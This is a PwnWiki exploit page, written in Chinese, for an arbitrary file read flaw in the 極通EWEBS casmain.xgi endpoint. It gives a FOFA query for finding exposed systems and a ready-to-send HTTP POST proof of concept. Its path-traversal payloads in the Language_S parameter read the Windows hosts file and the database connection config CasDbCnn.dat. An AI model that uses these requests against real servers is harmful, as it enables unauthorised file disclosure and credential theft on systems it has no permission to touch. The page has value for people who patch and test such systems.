極通EWEBS casmain.xgi 任意文件讀取漏洞

Other languages:

漏洞影響

極通EWEBS

FOFA

app="新软科技-极通EWEBS"

POC

漏洞請求包爲：

POST /casmain.xgi HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: PHPSESSID=923b86fa90ce1e14c82d4e36d1adc528; CookieLanguageName=ZH-CN
Content-Length: 57

Language_S=../../../../windows/system32/drivers/etc/hosts

可以配合 testweb.php 信息泄漏讀取敏感信息

Language_S=../../Data/CONFIG/CasDbCnn.dat

Anonymous

Search

極通EWEBS casmain.xgi 任意文件讀取漏洞

Namespaces

More

Page actions

漏洞影響

FOFA

POC

Navigation

Navigation

Community

PwnWiki.org

Wiki tools

Wiki tools

Anonymous

Search

極通EWEBS casmain.xgi 任意文件讀取漏洞

漏洞影響

FOFA

POC

Navigation

Wiki tools

Page tools